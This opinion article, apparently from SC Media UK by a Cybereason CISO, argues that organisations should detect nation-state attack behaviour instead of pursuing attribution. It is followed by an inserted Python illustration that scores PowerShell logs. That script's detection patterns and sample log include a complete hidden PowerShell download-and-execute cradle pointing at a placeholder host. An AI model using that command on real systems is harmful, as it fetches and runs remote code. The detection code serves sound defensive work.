Organisations need to identify nation state attacks - but not attackers
Tension on the international stage has reached new heights in recent months. General Sir Nick Carter, the chief of general staff for the British Army, recently went as far as to directly label Russia as “the most complex and capable security challenge” facing the UK since the Cold War.

General Carter cited cyber-attacks as one of the subtler means now being deployed on the international stage. The National Cyber Security Centre (NCSC) likewise recently highlighted evidence pointing towards Russian cyber-attacks targeting energy networks, telecommunications and media.

One consequence of these fraught international relations is an increased pressure to identify the perpetrator of an attack. It's natural to want to know the culprit behind an incident, and we would never be satisfied with only knowing the “what” and “why” of a conventional crime or act of international aggression without also knowing the “who”.

The challenge of attack attribution

However, accurately attributing an attack to a specific nation state is extremely challenging. In many cases, particularly in the initial knee-jerk reaction that tends to dominate the headlines, identification is based on circumstantial evidence. Common indicators include the use of code or tactics that have been used in past attacks, as well as the timing and language used.

All of these factors can be easily replicated by an unassociated third party, making it relatively easy to impersonate a specific nation state. This could be done to purposefully frame another nation for political reasons, or simply to deflect investigations. Complicating matters further, nation-state level tools have also become increasingly available on the dark web. Any fairly competent cyber-criminal can easily acquire advanced malware and techniques and start hacking like a nation state.

Conversely, it's common practice for nation states to conduct attacks and intelligence operations by hiring third parties. These groups have access to incredibly sophisticated tools and enjoy a degree of protection by the state. The practice creates an extra layer of obfuscation for attributing an attack and provides the state behind it with more deniability. It's almost impossible to gather evidence that distinguishes a group acting on behalf of a state from one that simply uses similar tools against the same targets.

Focus on attacks – not attackers

Just because nation state attribution is extremely challenging is not to say that it should not be attempted at all. However, this should firmly remain the concern of nation states themselves.

For an enterprise security team, attempting to investigate who is behind an attack is extremely complicated and time consuming, and most importantly does very little to improve the organisation's defences against further attack. Determining whether the attack was the work of a group acting on behalf of North Korea or of a single opportunist will make very little difference to the company's defensive posture – assuming they are ever able to go beyond guesswork in the first place.

However, while the identity of attackers should not be a priority for enterprises, it is an unfortunate reality that most private sector organisations are still potential targets for nation-state level attacks and must work to protect themselves.

Security measures such as reviewing static properties like MD5 hashes of malware files or the domain names of botnet command-and-control servers will not be effective, because most advanced tools were designed to evade these defences. Traditional tools such as antivirus and firewalls can rarely protect a company from these threats, because it isn't possible to detect advanced attacks just by looking for Indicators of Compromise (IOCs). The high-level malware used by nation states is also specifically designed to evade standard incident response, tricking investigators into believing they have identified and shut down a threat.

To stay safe against the threat of nation state attacks, as well as independent criminals adopting their tools and techniques, organisations must change their defensive techniques to focus on behavioural analysis. This will enable them to identify suspicious behaviour across the IT environment that points towards an attack in progress. Organisations also need to monitor the use of scripting programs like PowerShell, which are commonly used to carry out fileless malware attacks that leave no traditional IOCs. By focusing on identifying signs of nation state attacks, rather than identifying the attackers themselves, organisations can protect themselves on an increasingly tense international stage.
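As an added illustration of the behavioural approach described above (example code, not from the original article or from Cybereason), the following scores PowerShell script-block log entries on what the script does rather than on any hash or domain. The `host|event_id|script` line format, the weights and the alert threshold are assumptions, and the sample log lines are constructed.

```python
import re
from dataclasses import dataclass

# Behavioural heuristics for PowerShell script-block text (Windows event ID 4104
# records the decoded script). Each pattern carries an assumed weight. Because no
# hash or domain is involved, a re-packed or re-hosted tool trips the same rules.
BEHAVIOURS = {
    "encoded_command": (re.compile(r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    "download_to_memory": (re.compile(r"(DownloadString|DownloadData|Invoke-WebRequest)", re.I), 2),
    "in_memory_exec": (re.compile(r"(Invoke-Expression|\bIEX\b)", re.I), 2),
    "hidden_window": (re.compile(r"-w(indowstyle)?\s+hidden", re.I), 2),
    "policy_bypass": (re.compile(r"-ex(ecutionpolicy)?\s+bypass", re.I), 1),
    "reflective_load": (re.compile(r"\[System\.Reflection\.Assembly\]::Load", re.I), 3),
}

ALERT_THRESHOLD = 4  # assumed tuning value; adjust against your own baseline of admin activity

@dataclass
class Finding:
    host: str
    score: int
    behaviours: list

def score_script_block(text):
    """Return (score, matched behaviour names) for one script block."""
    hits = [name for name, (pat, _) in BEHAVIOURS.items() if pat.search(text)]
    return sum(BEHAVIOURS[n][1] for n in hits), hits

def analyse_log(lines):
    """Parse assumed 'host|event_id|script' lines and return findings at or above threshold."""
    findings = []
    for line in lines:
        host, event_id, script = line.split("|", 2)
        if event_id != "4104":  # only script-block logging events carry script text
            continue
        score, hits = score_script_block(script)
        if score >= ALERT_THRESHOLD:
            findings.append(Finding(host, score, hits))
    return findings

# Constructed sample entries: two routine admin scripts and one fileless-style chain
# (hidden window, policy bypass, download straight into memory, in-memory execution).
SAMPLE_LOG = [
    "ws01|4104|Get-ChildItem C:\\Logs -Recurse | Where-Object Length -gt 1MB",
    "ws02|4104|Import-Module ActiveDirectory; Get-ADUser -Filter * | Export-Csv users.csv",
    "ws03|4104|powershell -w hidden -ex bypass -c IEX (New-Object Net.WebClient).DownloadString('http://placeholder.example/stage')",
]

if __name__ == "__main__":
    for f in analyse_log(SAMPLE_LOG):
        print(f"{f.host}: score={f.score} behaviours={f.behaviours}")
```

Individual matches such as a policy bypass are common in legitimate administration, which is why the rules combine into a score rather than alerting on any single pattern.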

Contributed by Israel Barak, CISO, Cybereason.

*Note: The views expressed in this blog are those of the author and do not necessarily reflect the views of SC Media UK or Haymarket Media.